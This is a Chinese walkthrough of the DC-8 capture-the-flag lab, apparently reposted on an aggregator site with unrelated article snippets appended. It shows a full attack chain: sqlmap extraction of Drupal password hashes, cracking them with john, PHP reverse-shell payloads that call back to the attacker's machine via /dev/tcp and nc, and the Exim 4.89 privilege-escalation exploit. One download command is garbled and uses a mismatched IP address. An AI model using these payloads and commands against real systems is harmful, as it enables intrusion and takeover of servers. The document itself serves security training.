Vulhub 靶场训练 DC-8解析

一、环境搭建

kali的IP地址:192.168.200.14

DC-8的IP地址:192.168.200.13(一个flag)

靶机和攻击机处于同一个网络方式:nat或桥接

若出现开机错误,适当将dc的兼容版本改低,我的vmware workstation是17改成16.x就可以兼容

二、信息收集

1、扫描同网段存活主机

第一种方式:

arp-scan -l

1707096409_65c0395921b40dc60ff96.png!small?1707096410866

第二种方式:

netdiscover -r 192.168.200.0/24

1707096416_65c039601181f4d8b1c39.png!small?1707096417428

2、开放端口探测

nmap -sV -p-  192.168.200.13 

1707096425_65c039690ea669f78bb6c.png!small?1707096426517

开放端口有两个:22(SSH服务默认端口)和80(http默认端口)

3.目录扫描

1707096435_65c039730c337d1afd246.png!small?1707096435976

1707096440_65c03978b5445e89cc547.png!small?1707096441695

1707096446_65c0397e8e10780b3a8ed.png!small?1707096447687

查看robots。txt文件

1707096453_65c03985d5c12d553a15e.png!small?1707096454863

这些禁止爬取的文件基本上都访问不了

三,漏洞探测

访问web页面

1707096463_65c0398f22eef008ab219.png!small?1707096464271

和DC-7一样的CMS(Drupal),DC-7的版本是8的,这个DC-8的版本是7的

不过页面中存在这样的三个不同的URL:

http://192.168.200.13/?nid=1

http://192.168.200.13/?nid=2

http://192.168.200.13/?nid=3

可能存在文件包含和SQL注入的漏洞

1707096470_65c039962f0f115be5ec5.png!small?1707096471645

SQLMAP

1、扫描数据库

sqlmap -u "http://192.168.200.13/?nid=1" --dbs --batch

1707096477_65c0399d72bfdc0d23575.png!small?1707096478950

2、查询数据表名

sqlmap -u "http://192.168.200.13/?nid=1" -D d7db --tables --batch

1707096485_65c039a5d4af8cf95cfed.png!small?1707096487029

3、查询字段名

sqlmap -u "http://192.168.200.13/?nid=1" -D d7db -T users --columns --batch

1707096514_65c039c21d342f8fe79b0.png!small?1707096515383

4、查询字段值

sqlmap -u "http://192.168.200.13/?nid=1" -D d7db -T users -C name,pass --dump

1707096522_65c039ca6b2365f349616.png!small?1707096523660

账号:admin

密码: S S SD2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z

账号:john

密码: S S SDqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF

四。漏洞利用

1.爆破密码密文

Drupal的hash密文是经过特殊加密的,用john进行爆破,先保存到password.txt文件中

vim  password.txt

1707096531_65c039d3bb66f35725e7e.png!small?1707096532801

1707096536_65c039d81cbd1402d3f97.png!small?1707096537157

爆破出来密文:turtle

试试 能不能直接账号对 DC-8 进行ssh登录,没成功,只能想办法获取webshell了

1707096543_65c039df78274a11f26ce.png!small?1707096544679

2.反弹shell

先用获得的密码:turtle登录,试试登录后台,应该是john的密码

1707096551_65c039e79bfdde944fbc5.png!small?1707096552648

登录成功!

1707096560_65c039f011ecd7e3c15ad.png!small?1707096561194

还是运用上一靶场的方法,找一找能上传一句话木马的php文件

连不上。然后显示phpinfo的地址死活没反应

直接获取shell

PHP反弹 shell(Post 请求发送命令)<?php system("bash -i > /dev/tcp/192.168.200.14/8899 0>&1");?>    #交互式shell<?php system("bash -c 'sh -i &>/dev/tcp/192.168.200.14/8899 0>&1'");?>  #交互式shell<?php
exec("nc -e /bin/bash 192.168.200.14 8899");
?> 

将提交重定向行Confirmation page(确认页面)给勾上,然后滑下点保存,联系随便填入联系表单,点击发送,触发PHP代码

1707096569_65c039f9a28c02c881412.png!small?1707096570796

1707096577_65c03a01c32a87b84ba20.png!small?1707096578738

成功反弹shell

1707096584_65c03a08b316ebe7af53b.png!small?1707096585882

3.提权

查一下suid权限的二进制文件

find / -perm -4000 -print 2>/dev/null

1707096593_65c03a11292240a711ffe.png!small?1707096594204

查询Exim 版本为4.89

1707096599_65c03a17d0a1b56852b03.png!small?1707096601070

利用kali搜索EXP

1707096607_65c03a1f33af4c2c75f53.png!small?1707096608721

不破坏原有结构,复制一份新的命名为shell.sh(到kali端的桌面)

cp /usr/share/exploitdb/exploits/linux/local/46996.sh shell.sh  

开启http服务

python -m http.server 8899

注:交互页面,方便后续操作

python -c 'import pty;pty.spawn("/bin/bash")'

在DC-7中下载该文件

wget  //192.168.200.57:8888/shell.sh

1707096618_65c03a2ab235c83dad241.png!small?1707096619975

文件权限是无执行权限的,赋予执行权限

chmod 777 shell.sh

1707096624_65c03a3099b52fea1d07b.png!small?1707096625612

赋予可执行权限

1707096631_65c03a37429f8a5dd4cb6.png!small?1707096632431

接着根据sh脚本提示,执行文件

./shell.sh

不过奇怪的是,执行完之后还是普通权限

1707096639_65c03a3f0fd4448180713.png!small?1707096640196

查看脚本的使用规则,又两个参数可用

1707096646_65c03a46a9b6db15e4945.png!small?1707096647939

将两个规则分别运行,第一个规则在运行之后无效;第二个规则成功运行,等待几秒之后,输入whoami可以看到提权成功

1707096655_65c03a4f05f984e4d9eac.png!small?1707096656246

近到root目录,查看最终flag内容

1707096662_65c03a56e5e5373c325fd.png!small?1707096664524

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/700970.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

pythonJax小记(三):python: 使用Jax已知若干坐标,提取二维矩阵中对应坐标的值(持续更新,评论区可以补充)

python: 使用Jax已知若干坐标&#xff0c;提取二维矩阵中对应坐标的值 前言直接上代码 前言 自用&#xff0c;刚开始接触可能顺序会比较乱。 直接上代码 import jax.numpy as jnp from jax import jitjit def _extractValues(matrix, positions): values matrix[pos…

Vue事件处理之v-on

1. 使用及定义 定义方法 function 方法名称(接受的event或是什么都不写) {//不管方法后括号内写与不写event,都可以接受到方法内表达式 }//定义一个接受参数的方法,此时也会在传入event function 方法名称(传入参数) {//可接受传入参数与event方法内表达式 } //定义一个接受参…

说一下 JVM 有哪些垃圾回收器?

如果说垃圾收集算法是内存回收的方法论&#xff0c;那么垃圾收集器就是内存回收的具体实现。下图展示了7种作用于不同分代的收集器&#xff0c;其中用于回收新生代的收集器包括Serial、ParNew、Parallel Scavenge&#xff0c;回收老年代的收集器包括SerialOld、Parallel Old、C…

34.云原生之devops集成istio

云原生专栏大纲 文章目录 什么样的项目适合上istio参考bookinfo中reviews服务资源DeploymentServiceGatewayVirtualServiceDestinationRule kustomize资源清单 经过前边的学习我们已经知道istio官方bookinfo应用的部署及流量治理。我们自己的项目cicd发布后如何使用Istio呢&am…

恒创科技:香港服务器和香港云服务器哪个好啊?

"香港服务器"和"香港云服务器"&#xff0c;是两种不同的香港区域的服务器&#xff0c;免备案&#xff0c;都有各自的优势和适用场景&#xff0c;取决于您的需求和预算。以下是它们的一些区别和特点&#xff1a; 香港服务器&#xff1a; 物理服务器&#xf…

第2.5章 StarRocks表设计——行列混存表

注&#xff1a;本篇文章阐述的是StarRocks- 3.2.3版本的行列混存表 一、概述 1.1 背景 StarRocks 基于列存格式引擎构建&#xff0c;在高并发场景&#xff0c;用户希望从系统中获取整行数据。当表宽时&#xff0c;列存格式将放大随机IO和读写。自3.2.3开始&#xff0c;StarRo…

Java/Python/Go不同开发语言基础数据操作总结-基础篇

Java/Python/Go不同开发语言基础数据操作总结-字符篇 1. Java1.1 字符串操作1.1.1 构建String1.1.2 String拆分转列表1.1.4 列表拼接成String1.1.4 寻找第一个匹配的子字符串1.1.5 判断2个字符串是否相同 2. Go2.1 字符串操作2.1.1 构建String2.1.2 String拆分转列表2.1.3 列表…

(delphi11最新学习资料) Object Pascal 学习笔记---第5章第5节(delphi中的指针)

5.5 什么是指针&#xff1f; ​ 指针是 Object Pascal 语言的另一种基本数据类型。一些面向对象的语言在很大程度上隐藏了指针这种强大但危险的语言结构&#xff0c;而 Object Pascal 则允许程序员在需要时使用指针&#xff08;一般情况下并不经常使用&#xff09;。 ​ 那么…

密码算法简单整理

密码组成 国外的密码算法&#xff1a; DES、3DES、AES、SHA1、SHA2、SHA3、DSA、RSA、RC4等 高危密码算法&#xff1a; MD5、DES、RSA1024以下、SSH1.0、SSL3.0以下、SHA1等 密码算法通常可分为三大类&#xff1a; 对称密码算法 非对称密码算法 密码杂凑算法 1.对称密码算法&am…

LeetCode 1637.两点之间不包含任何点的最宽垂直区域

给你 n 个二维平面上的点 points &#xff0c;其中 points[i] [xi, yi] &#xff0c;请你返回两点之间内部不包含任何点的 最宽垂直区域 的宽度。 垂直区域 的定义是固定宽度&#xff0c;而 y 轴上无限延伸的一块区域&#xff08;也就是高度为无穷大&#xff09;。 最宽垂直区…

udp服务器【Linux网络编程】

目录 一、UDP服务器 1、创建套接字 2、绑定套接字 3、运行 1&#xff09;读取数据 2&#xff09;发送数据 二、UDP客户端 创建套接字&#xff1a; 客户端不用手动bind 收发数据 处理消息和网络通信解耦 三、应用场景 1、服务端执行命令 2、Windows上的客户端 3…

掌控互联网脉络:深入解析边界网关协议(BGP)的力量与挑战

BGP简介 边界网关协议&#xff08;Border Gateway Protocol&#xff0c;BGP&#xff09;是互联网上最重要的路由协议之一&#xff0c;负责在不同自治系统&#xff08;AS&#xff09;之间传播路由信息。BGP使得互联网中的不同网络可以互相通信&#xff0c;支持互联网的规模化扩…

2278. 企鹅游行(最大流,拆点)

活动 - AcWing 在南极附近的某个地方&#xff0c;一些企鹅正站在一些浮冰上。 作为群居动物&#xff0c;企鹅们喜欢聚在一起&#xff0c;因此&#xff0c;它们想在同一块浮冰上会合。 企鹅们不想淋湿自己&#xff0c;所以它们只能利用自己有限的跳跃能力&#xff0c;在一块块…

UnityWebGL 设置全屏

这是Unity导出Web默认打开的页面尺寸 修改后效果 修改 index.html 文件 1.div元素的id属性值为"unity-container"&#xff0c;宽度和高度都设置为100%&#xff0c;意味着该div元素将占据整个父容器的空间。canvas元素的id属性值为"unity-canvas"&#xff…

Llama中文大模型-模型部署

​​​​​​选择学习路径 快速上手-使用Anaconda 第 0 步&#xff1a;前提条件 确保安装了 Python 3.10 以上版本。 第 1 步&#xff1a;准备环境 如需设置环境&#xff0c;安装所需要的软件包&#xff0c;运行下面的命令。 git clone https://github.com/LlamaFamily/Ll…

论文阅读——SimpleClick

SimpleClick: Interactive Image Segmentation with Simple Vision Transformers 模型直接在VIT上增加交互是分割 用VIT MAE方法训练的预训练权重 用交互式分割方法微调&#xff0c;微调流程&#xff1a; 1、在当前分割自动模拟点击&#xff0c;没有人为提供的点击 受到RITM启发…

uni-app nvue vue3 setup中实现加载webview,解决nvue中获取不到webview实例的问题

注意下面的方法只能在app端使用&#xff0c; let wv plus.webview.create("","custom-webview",{plusrequire:"none", uni-app: none, width: 300,height:400,top:uni.getSystemInfoSync().statusBarHeight44 }) wv.loadURL("https://ww…

1003: 【C1】【一维数组】【入门】统计

题目描述 给出n个整数和k&#xff0c;统计其中有多少个整数和k相等。 输入 第一行为1个整数 n &#xff08;1 < n < 1000 &#xff09;&#xff0c;整数的个数。 之后 的n 行&#xff0c;每行1个整数。 最后一行&#xff0c;1个整数k。 输出 一个整数&#xff0c;表…

使用PM2实现高效的应用监控与管理

微信搜索“好朋友乐平”关注公众号。 1. pm2 PM2 是一个流行的进程管理器&#xff0c;用于 Node.js 应用程序。它支持应用程序的负载均衡、自动重启、日志管理、监控以及多环境管理等功能。PM2让开发者能够以守护进程的方式运行和管理 Node.js 应用&#xff0c;即使在应用崩溃…

基于springboot+vue的精准扶贫管理系统(前后端分离)

博主主页&#xff1a;猫头鹰源码 博主简介&#xff1a;Java领域优质创作者、CSDN博客专家、阿里云专家博主、公司架构师、全网粉丝5万、专注Java技术领域和毕业设计项目实战&#xff0c;欢迎高校老师\讲师\同行交流合作 ​主要内容&#xff1a;毕业设计(Javaweb项目|小程序|Pyt…